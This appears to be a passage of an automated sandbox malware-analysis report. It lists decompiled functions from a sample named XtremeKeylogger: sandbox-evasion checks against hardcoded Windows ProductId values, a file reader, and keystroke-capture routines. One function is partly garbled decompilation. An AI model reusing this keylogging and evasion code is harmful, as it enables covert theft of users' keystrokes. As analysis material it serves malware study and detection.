0x00c87378
0x00c8737d
0x00c87382
0x00c87387
0x00c8738a
0x00c8738c
0x00c87396
0x00c8739d
0x00c873a5
0x00c873da

APIs

GetDesktopWindow.USER32 ref: 00C87390
GetWindowRect.USER32(00000000), ref: 00C87396
GetModuleHandleA.KERNEL32(00000000), ref: 00C8739D
RegisterClassW.USER32(?), ref: 00C873A5
CreateWindowExW.USER32(00000080,XtremeKeylogger,00C873DC,98000000,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C873CF

Strings

XtremeKeylogger, xrefs: 00C87348, 00C873C9

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C88324, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33
registry

C-Code - Quality: 100%

			E00C88324() {
				char _v264;
				int _v268;
				void* _v272;
				int _t15;

				_t15 = 0;
				if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", 0, 1,  &_v268) == 0) {
					_v268 = 0x101;
					RegQueryValueExA(_v272, "ProductId", 0, 0,  &_v264,  &_v268);
					if( &_v264 == "55274-640-2673064-23950") {
						_t15 = 1;
					}
				}
				RegCloseKey(_v272);
				return _t15;
			}

0x00c8832b
0x00c88343
0x00c88345
0x00c88365
0x00c88373
0x00c88375
0x00c88375
0x00c88373
0x00c8837b
0x00c88389

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001), ref: 00C8833C
RegQueryValueExA.ADVAPI32(?,ProductId,00000000,00000000,?,?,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001), ref: 00C88365
RegCloseKey.ADVAPI32(00000000,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001), ref: 00C8837B

Strings

55274-640-2673064-23950, xrefs: 00C8836E
ProductId, xrefs: 00C8835B
Software\Microsoft\Windows\CurrentVersion, xrefs: 00C88332

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C883DC, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33
registry

C-Code - Quality: 100%

			E00C883DC() {
				char _v264;
				int _v268;
				void* _v272;
				int _t15;

				_t15 = 0;
				if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", 0, 1,  &_v268) == 0) {
					_v268 = 0x101;
					RegQueryValueExA(_v272, "ProductId", 0, 0,  &_v264,  &_v268);
					if( &_v264 == "76487-644-3177037-23510") {
						_t15 = 1;
					}
				}
				RegCloseKey(_v272);
				return _t15;
			}

0x00c883e3
0x00c883fb
0x00c883fd
0x00c8841d
0x00c8842b
0x00c8842d
0x00c8842d
0x00c8842b
0x00c88433
0x00c88441

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001), ref: 00C883F4
RegQueryValueExA.ADVAPI32(?,ProductId,00000000,00000000,?,?,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001), ref: 00C8841D
RegCloseKey.ADVAPI32(00000000,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001), ref: 00C88433

Strings

ProductId, xrefs: 00C88413
Software\Microsoft\Windows\CurrentVersion, xrefs: 00C883EA
76487-644-3177037-23510, xrefs: 00C88426

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C88494, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33
registry

C-Code - Quality: 100%

			E00C88494() {
				char _v264;
				int _v268;
				void* _v272;
				int _t15;

				_t15 = 0;
				if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", 0, 1,  &_v268) == 0) {
					_v268 = 0x101;
					RegQueryValueExA(_v272, "ProductId", 0, 0,  &_v264,  &_v268);
					if( &_v264 == "76487-337-8429955-22614") {
						_t15 = 1;
					}
				}
				RegCloseKey(_v272);
				return _t15;
			}

0x00c8849b
0x00c884b3
0x00c884b5
0x00c884d5
0x00c884e3
0x00c884e5
0x00c884e5
0x00c884e3
0x00c884eb
0x00c884f9

APIs

RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001), ref: 00C884AC
RegQueryValueExA.ADVAPI32(?,ProductId,00000000,00000000,?,?,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001), ref: 00C884D5
RegCloseKey.ADVAPI32(00000000,80000002,Software\Microsoft\Windows\CurrentVersion,00000000,00000001), ref: 00C884EB

Strings

ProductId, xrefs: 00C884CB
Software\Microsoft\Windows\CurrentVersion, xrefs: 00C884A2
76487-337-8429955-22614, xrefs: 00C884DE

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C835DC, Relevance: 9.1, APIs: 6, Instructions: 58
file

C-Code - Quality: 100%

			E00C835DC(WCHAR* __eax, void** __edx) {
				long _v16;
				struct _OVERLAPPED* _v20;
				long _v24;
				WCHAR* _t18;
				void* _t19;
				long _t23;
				void** _t24;

				_t24 = __edx;
				_t18 = __eax;
				_v24 = 0;
				_v20 = 0;
				if(E00C835B0(__eax) != 0) {
					_t19 = CreateFileW(_t18, 0x80000000, 1, 0, 3, 0, 0);
					if(_t19 != 0xffffffff) {
						_v24 = GetFileSize(_t19, 0);
						_v20 = 0;
						_t23 = _v24;
						 *_t24 = VirtualAlloc(0, _t23, 0x1000, 4);
						SetFilePointer(_t19, 0, 0, 0);
						ReadFile(_t19,  *_t24, _t23,  &_v16, 0);
					}
					CloseHandle(_t19);
				}
				return _v24;
			}

0x00c835e2
0x00c835e4
0x00c835e6
0x00c835ed
0x00c835fe
0x00c83615
0x00c8361a
0x00c83626
0x00c83629
0x00c83634
0x00c83640
0x00c83649
0x00c8365a
0x00c8365a
0x00c83660
0x00c83660
0x00c83672

APIs

Part of subcall function 00C835B0: FindFirstFileW.KERNEL32(00000000), ref: 00C835B9
Part of subcall function 00C835B0: CloseHandle.KERNEL32(00000000), ref: 00C835CA

CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C83610
GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C8361F
VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C8363B
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00001000,00000004,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000), ref: 00C83649
ReadFile.KERNEL32(00000000,?,?,?,00000000), ref: 00C8365A
CloseHandle.KERNEL32(00000000), ref: 00C83660

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C855E2, Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 305
keyboard

C-Code - Quality: 43%

			E00C855E2(signed int __eax, void* __ebx, signed int __ecx, signed int __edx, void* __edi, signed int __esi) {
				signed char _t37;
				intOrPtr* _t39;
				void* _t40;
				intOrPtr* _t42;
				int _t69;
				int _t73;
				signed char _t97;
				int _t98;
				signed int _t100;
				void* _t111;
				intOrPtr _t113;
				void* _t130;
				intOrPtr* _t131;
				int _t141;
				int _t143;
				void* _t146;
				void* _t148;
				void* _t149;

				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__ecx =  *__ecx + __ecx;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *0x491f0000 =  *0x491f0000 + __eax;
				asm("sbb ecx, [esi+0x4a]");
				_t37 = __eax & 0x0000003e;
				_push(_t146);
				_push(_t37);
				_push(es);
				asm("aas");
				_t97 = __ebx +  *0x18000000 + 0x00000001 &  *__ecx &  *0;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *_t37 =  *_t37 + _t37;
				 *((intOrPtr*)(_t97 + 8)) =  *((intOrPtr*)(_t97 + 8)) + __edx;
				 *__edx =  *__edx | __ecx;
				_t100 = __ecx |  *(__ecx + 0x11100f0e);
				es = _t149;
				 *__edx =  *__edx + _t97;
				asm("sbb al, 0x3");
				 *__esi =  *__esi ^ __edx;
				asm("aaa");
				asm("daa");
				 *_t100 =  *_t100 - _t100;
				_t39 = _t37 + 0x25 - 0x2d;
				asm("das");
				 *__edx =  *__edx ^ __esi;
				 *_t39 =  *_t39 + _t39;
				 *_t39 =  *_t39 + _t39;
				_t98 = _t97 - 1;
				_push(__edx);
				 *_t39 =  *_t39 + _t39;
				 *_t39 =  *_t39 + _t39;
				 *_t39 =  *_t39 + _t39;
				 *_t39 =  *_t39 + _t39;
				 *_t39 =  *_t39 + _t39;
				 *_t39 =  *_t39 + _t39;
				 *_t39 =  *_t39 + _t39;
				 *_t39 =  *_t39 + _t39;
				_t111 = __edx + 1;
				_t130 = __edi - 1;
				_push(_t100 -  *_t97);
				 *_t39 =  *_t39 + _t39;
				 *_t39 =  *_t39 + _t39;
				 *_t39 =  *_t39 + _t39;
				 *((intOrPtr*)(_t130 + 0x56)) =  *((intOrPtr*)(_t130 + 0x56)) + _t111;
				_pop(_t40);
				_t148 = _t146 - 1 + 1;
				_t131 = _t130 + 1;
				_t42 = _t40 - 1 + 1;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t42 =  *_t42 + _t42;
				 *_t131 =  *_t131 + _t111;
				 *_t42 =  *_t42 + _t42;
				 *0 =  *0 + _t111;
				 *_t42 =  *_t42 + _t42;
				 *((intOrPtr*)(_t98 + _t111)) =  *((intOrPtr*)(_t98 + _t111)) + _t111;
				 *_t42 =  *_t42 + _t42;
				asm("adc al, [eax]");
				 *_t42 =  *_t42 + _t42;
				 *((intOrPtr*)((__esi ^  *__esi) + 1)) =  *((intOrPtr*)((__esi ^  *__esi) + 1)) + _t111;
				_push(ds);
				asm("repne pop ebp");
				asm("enter 0x3a00, 0x58");
				asm("enter 0x4b00, 0x58");
				asm("enter 0x5c00, 0x58");
				asm("enter 0x6d00, 0x58");
				asm("enter 0x7e00, 0x58");
				asm("enter 0x8f00, 0x58");
				asm("enter 0xa000, 0x58");
				asm("enter 0xb100, 0x58");
				asm("enter 0xc200, 0x58");
				asm("enter 0xd300, 0x58");
				asm("enter 0xe400, 0x58");
				asm("enter 0xf500, 0x58");
				asm("enter 0x600, 0x59");
				asm("enter 0x1700, 0x59");
				asm("enter 0x2800, 0x59");
				asm("enter 0x3900, 0x59");
				asm("enter 0x4a00, 0x59");
				asm("enter 0x5b00, 0x59");
				asm("enter 0x6c00, 0x59");
				asm("enter 0x7d00, 0x59");
				asm("enter 0x8e00, 0x59");
				asm("enter 0x9f00, 0x59");
				asm("enter 0xb000, 0x59");
				asm("enter 0xc100, 0x59");
				asm("enter 0xd200, 0x59");
				asm("enter 0xe300, 0x59");
				asm("enter 0xf400, 0x59");
				asm("enter 0x500, 0x5a");
				asm("enter 0x1600, 0x5a");
				asm("enter 0x2700, 0x5a");
				asm("enter 0x3800, 0x5a");
				asm("enter 0x4900, 0x5a");
				asm("enter 0x5a00, 0x5a");
				asm("enter 0x6b00, 0x5a");
				asm("enter 0x7c00, 0x5a");
				asm("enter 0x8d00, 0x5a");
				asm("enter 0x9e00, 0x5a");
				asm("enter 0xaf00, 0x5a");
				asm("enter 0xc000, 0x5a");
				asm("enter 0xd100, 0x5a");
				asm("enter 0xe200, 0x5a");
				asm("enter 0xf300, 0x5a");
				asm("enter 0x400, 0x5b");
				asm("enter 0x1500, 0x5b");
				asm("enter 0x2600, 0x5b");
				asm("enter 0x3700, 0x5b");
				asm("enter 0x4800, 0x5b");
				asm("enter 0x5900, 0x5b");
				asm("enter 0x6a00, 0x5b");
				asm("enter 0x7b00, 0x5b");
				asm("enter 0x8c00, 0x5b");
				asm("enter 0x9d00, 0x5b");
				asm("enter 0xae00, 0x5b");
				asm("enter 0xbf00, 0x5b");
				asm("enter 0xd000, 0x5b");
				asm("enter 0xe100, 0x5b");
				asm("enter 0xf200, 0x5b");
				asm("enter 0x300, 0x5c");
				asm("enter 0x1400, 0x5c");
				asm("enter 0x2500, 0x5c");
				asm("enter 0x3600, 0x5c");
				asm("enter 0x4700, 0x5c");
				asm("enter 0x5800, 0x5c");
				asm("enter 0x6900, 0x5c");
				asm("enter 0x7a00, 0x5c");
				asm("enter 0x8b00, 0x5c");
				asm("enter 0x9c00, 0x5c");
				asm("enter 0xad00, 0x5c");
				asm("enter 0xbe00, 0x5c");
				asm("enter 0xcf00, 0x5c");
				asm("enter 0xe000, 0x5c");
				asm("enter 0xf100, 0x5c");
				asm("enter 0x200, 0x5d");
				asm("enter 0x1300, 0x5d");
				asm("enter 0x2400, 0x5d");
				asm("enter 0x3500, 0x5d");
				asm("enter 0x4600, 0x5d");
				asm("enter 0x5700, 0x5d");
				asm("enter 0x6800, 0x5d");
				asm("enter 0x7600, 0x5d");
				asm("enter 0x8400, 0x5d");
				asm("enter 0x9200, 0x5d");
				asm("enter 0xa000, 0x5d");
				asm("enter 0xae00, 0x5d");
				asm("enter 0xbc00, 0x5d");
				asm("enter 0xca00, 0x5d");
				asm("enter 0xd800, 0x5d");
				asm("enter 0xe600, 0x5d");
				asm("enter 0x8b00, 0xc7");
				E00C81BB4(_t131, L"[Numpad +]");
				if(E00C81D04( *_t131) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *_t131) > 0 && E00C81F1C(L"Numpad",  *_t131) <= 0) {
					_t98 = 1;
					E00C81BB4(_t131, L"KeyDelBackspace");
				}
				 *((char*)(_t148 - 5)) = E00C854EC();
				_t141 = ToUnicodeEx( *(_t148 - 2) & 0x0000ffff,  *(_t148 - 4) & 0x0000ffff, _t148 - 0x105, _t148 - 0x310, 0x100, 0,  *(_t148 + 0xc));
				if(_t141 <= 0) {
					__eflags = _t141;
					if(_t141 < 0) {
						 *0xc8deec =  *(_t148 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t148 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t148 - 0x105, 0x40 << 2);
						_t131 = _t131;
						_t143 = _t141;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t143;
						if(_t143 < 0) {
							do {
								_t69 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t148 - 0x410, _t148 - 0x310, 0x100, 0,  *(_t148 + 0xc));
								__eflags = _t69;
							} while (_t69 < 0);
						}
					}
				} else {
					memcpy(_t148 - 0x210, 0xc8deec, 0x42 << 2);
					_t131 = _t131;
					if(E00C81D04( *_t131) == 0) {
						E00C81CD8(_t131, 0x80, _t148 - 0x310);
						_t162 =  *((char*)(_t148 - 5));
						if( *((char*)(_t148 - 5)) != 0) {
							E00C85148( *_t131, _t98, 0x80, _t148 - 0x418, _t131, 0xc8deec, __eflags);
							E00C81BB4(_t131,  *((intOrPtr*)(_t148 - 0x418)));
						} else {
							E00C850CC( *_t131, _t98, 0x80, _t148 - 0x414, _t131, 0xc8deec, _t162);
							E00C81BB4(_t131,  *((intOrPtr*)(_t148 - 0x414)));
						}
					}
					_t73 =  *(_t148 - 0x210);
					if(_t73 != 0) {
						ToUnicodeEx(_t73,  *(_t148 - 0x20c), _t148 - 0x208, _t148 - 0x310, 0x100, 0,  *(_t148 + 0xc));
					}
					E00C8291C();
				}
				if(_t98 == 1) {
					E00C81B78(_t131);
				}
				_pop(_t113);
				 *[fs:eax] = _t113;
				_push(E00C85FC6);
				return E00C81B90(_t148 - 0x418, 2);
			}

0x00c855e8
0x00c855ea
0x00c855ec
0x00c855f0
0x00c855f2
0x00c855f4
0x00c855fa
0x00c855fd
0x00c85600
0x00c85601
0x00c85605
0x00c85607
0x00c85608
0x00c8560e
0x00c85610
0x00c85612
0x00c85614
0x00c85616
0x00c85618
0x00c8561a
0x00c8561c
0x00c8561e
0x00c85620
0x00c85622
0x00c85624
0x00c85626
0x00c85628
0x00c8562a
0x00c8562c
0x00c8562e
0x00c85630
0x00c85632
0x00c85634
0x00c85636
0x00c85638
0x00c8563b
0x00c8563d
0x00c85644
0x00c85645
0x00c85647
0x00c8564b
0x00c8564d
0x00c85654
0x00c85655
0x00c85659
0x00c8565b
0x00c8565d
0x00c85666
0x00c85668
0x00c8566a
0x00c8566b
0x00c8566c
0x00c8566e
0x00c85670
0x00c85672
0x00c85674
0x00c85676
0x00c85678
0x00c8567a
0x00c8567c
0x00c8567d
0x00c8567f
0x00c85680
0x00c85682
0x00c85684
0x00c85686
0x00c85689
0x00c8568a
0x00c8568b
0x00c8568e
0x00c85690
0x00c85692
0x00c85694
0x00c85696
0x00c85698
0x00c8569a
0x00c8569c
0x00c8569e
0x00c856a0
0x00c856a2
0x00c856a4
0x00c856a6
0x00c856a8
0x00c856aa
0x00c856ac
0x00c856ae
0x00c856b0
0x00c856b2
0x00c856b4
0x00c856b6
0x00c856b8
0x00c856ba
0x00c856bc
0x00c856be
0x00c856c0
0x00c856c2
0x00c856c8
0x00c856ca
0x00c856cd
0x00c856cf
0x00c856d1
0x00c856d3
0x00c856d5
0x00c856d6
0x00c856d8
0x00c856dc
0x00c856e0
0x00c856e4
0x00c856e8
0x00c856ec
0x00c856f0
0x00c856f4
0x00c856f8
0x00c856fc
0x00c85700
0x00c85704
0x00c85708
0x00c8570c
0x00c85710
0x00c85714
0x00c85718
0x00c8571c
0x00c85720
0x00c85724
0x00c85728
0x00c8572c
0x00c85730
0x00c85734
0x00c85738
0x00c8573c
0x00c85740
0x00c85744
0x00c85748
0x00c8574c
0x00c85750
0x00c85754
0x00c85758
0x00c8575c
0x00c85760
0x00c85764
0x00c85768
0x00c8576c
0x00c85770
0x00c85774
0x00c85778
0x00c8577c
0x00c85780
0x00c85784
0x00c85788
0x00c8578c
0x00c85790
0x00c85794
0x00c85798
0x00c8579c
0x00c857a0
0x00c857a4
0x00c857a8
0x00c857ac
0x00c857b0
0x00c857b4
0x00c857b8
0x00c857bc
0x00c857c0
0x00c857c4
0x00c857c8
0x00c857cc
0x00c857d0
0x00c857d4
0x00c857d8
0x00c857dc
0x00c857e0
0x00c857e4
0x00c857e8
0x00c857ec
0x00c857f0
0x00c857f4
0x00c857f8
0x00c857fc
0x00c85800
0x00c85804
0x00c85808
0x00c8580c
0x00c85810
0x00c85814
0x00c85818
0x00c8581c
0x00c85820
0x00c85824
0x00c85828
0x00c8582c
0x00c85830
0x00c85834
0x00c85838
0x00c85841
0x00c85dfb
0x00c85e26
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
Part of subcall function 00C81CD8: SysFreeString.OLEAUT32(?), ref: 00C81C89

MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F5C
MapVirtualKeyW.USER32(0000006E,00000001), ref: 00C85F82
ToUnicodeEx.USER32(0000006E,00000000,0000006E,00000001,?,?,00000100), ref: 00C85F8A

Part of subcall function 00C81B90: SysFreeString.OLEAUT32(?), ref: 00C81BA3

Strings

Numpad, xrefs: 00C85E18
KeyDelBackspace, xrefs: 00C85E2A
[Numpad +], xrefs: 00C8583C

Memory Dump Source

Source File: 00000003.00000001.14905808954.00C81000.00000020.sdmp, Offset: 00C80000, based on PE: true

Associated: 00000003.00000001.14905773823.00C80000.00000002.sdmp
Associated: 00000003.00000001.14905871848.00C8B000.00000004.sdmp
Associated: 00000003.00000001.14905882187.00C92000.00000004.sdmp
Associated: 00000003.00000001.14905890356.00C94000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_c80000_server.jbxd

Yara matches

Function 00C85A9E, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 98
keyboard

C-Code - Quality: 80%

			E00C85A9E(void* __ecx, intOrPtr* __edi, void* __eflags) {
				int _t55;
				int _t59;
				intOrPtr _t89;
				intOrPtr* _t105;
				int _t112;
				int _t114;
				void* _t117;

				_t105 = __edi;
				E00C81BB4(__edi, L"[F1]");
				if(E00C81D04( *__edi) > 0 &&  *0xc8da4a == 1 && E00C81F1C(0xc8670c,  *__edi) > 0 && E00C81F1C(L"Numpad",  *__edi) <= 0) {
					E00C81BB4(__edi, L"KeyDelBackspace");
				}
				 *((char*)(_t117 - 5)) = E00C854EC();
				_t112 = ToUnicodeEx( *(_t117 - 2) & 0x0000ffff,  *(_t117 - 4) & 0x0000ffff, _t117 - 0x105, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
				if(_t112 <= 0) {
					__eflags = _t112;
					if(_t112 < 0) {
						 *0xc8deec =  *(_t117 - 2) & 0x0000ffff;
						 *0xc8def0 =  *(_t117 - 4) & 0x0000ffff;
						memcpy(0xc8def4, _t117 - 0x105, 0x40 << 2);
						_t105 = _t105;
						_t114 = _t112;
						E00C8291C();
						MapVirtualKeyW(0x6e, 1);
						__eflags = _t114;
						if(_t114 < 0) {
							do {
								_t55 = ToUnicodeEx(0x6e, MapVirtualKeyW(0x6e, 1), _t117 - 0x410, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
								__eflags = _t55;
							} while (_t55 < 0);
						}
					}
				} else {
					memcpy(_t117 - 0x210, 0xc8deec, 0x42 << 2);
					_t105 = _t105;
					if(E00C81D04( *_t105) == 0) {
						E00C81CD8(_t105, 0x80, _t117 - 0x310);
						_t128 =  *((char*)(_t117 - 5));
						if( *((char*)(_t117 - 5)) != 0) {
							E00C85148( *_t105, 1, 0x80, _t117 - 0x418, _t105, 0xc8deec, __eflags);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x418)));
						} else {
							E00C850CC( *_t105, 1, 0x80, _t117 - 0x414, _t105, 0xc8deec, _t128);
							E00C81BB4(_t105,  *((intOrPtr*)(_t117 - 0x414)));
						}
					}
					_t59 =  *(_t117 - 0x210);
					if(_t59 != 0) {
						ToUnicodeEx(_t59,  *(_t117 - 0x20c), _t117 - 0x208, _t117 - 0x310, 0x100, 0,  *(_t117 + 0xc));
					}
					E00C8291C();
				}
				if(1 == 1) {
					E00C81B78(_t105);
				}
				_pop(_t89);
				 *[fs:eax] = _t89;
				_push(E00C85FC6);
				return E00C81B90(_t117 - 0x418, 2);
			}

0x00c85a9e
0x00c85aa5
0x00c85dfb
0x00c85e2f
0x00c85e2f
0x00c85e39
0x00c85e64
0x00c85e68
0x00c85f1c
0x00c85f1e
0x00c85f24
0x00c85f2d
0x00c85f44
0x00c85f46
0x00c85f47
0x00c85f53
0x00c85f5c
0x00c85f61
0x00c85f63
0x00c85f65
0x00c85f8a
0x00c85f91
0x00c85f91
0x00c85f65
0x00c85f63
0x00c85e6e
0x00c85e7f
0x00c85e81
0x00c85e8b
0x00c85e9a
0x00c85e9f
0x00c85ea3
0x00c85ec9
0x00c85ed6
0x00c85ea5
0x00c85ead
0x00c85eba
0x00c85eba
0x00c85ea3
0x00c85edb
0x00c85ee3
0x00c85f06
0x00c85f06
0x00c85f15
0x00c85f15
0x00c85f98
0x00c85f9c
0x00c85f9c
0x00c85fa3
0x00c85fa6
0x00c85fa9
0x00c85fbe

APIs

Part of subcall function 00C81BB4: SysFreeString.OLEAUT32(00C89A90), ref: 00C81B86
Part of subcall function 00C81BB4: SysReAllocStringLen.OLEAUT32(00C89B88,00C89A90,00000014), ref: 00C81BCA

Part of subcall function 00C85148: CharLowerW.USER32(?), ref: 00C85186

Part of subcall function 00C850CC: CharUpperW.USER32(?), ref: 00C8510A

Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C854F1
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C854FE
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8550E
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C8551B
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C8552B
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85538
Part of subcall function 00C854EC: GetKeyState.USER32(00000014), ref: 00C85548
Part of subcall function 00C854EC: GetKeyState.USER32(00000010), ref: 00C85555

ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85E5F
ToUnicodeEx.USER32(?,?,?,?,00000100,00000000,?), ref: 00C85F06

Part of subcall function 00C81CD8: SysAllocStringLen.OLEAUT32(00000000,00000000), ref: 00C81C77
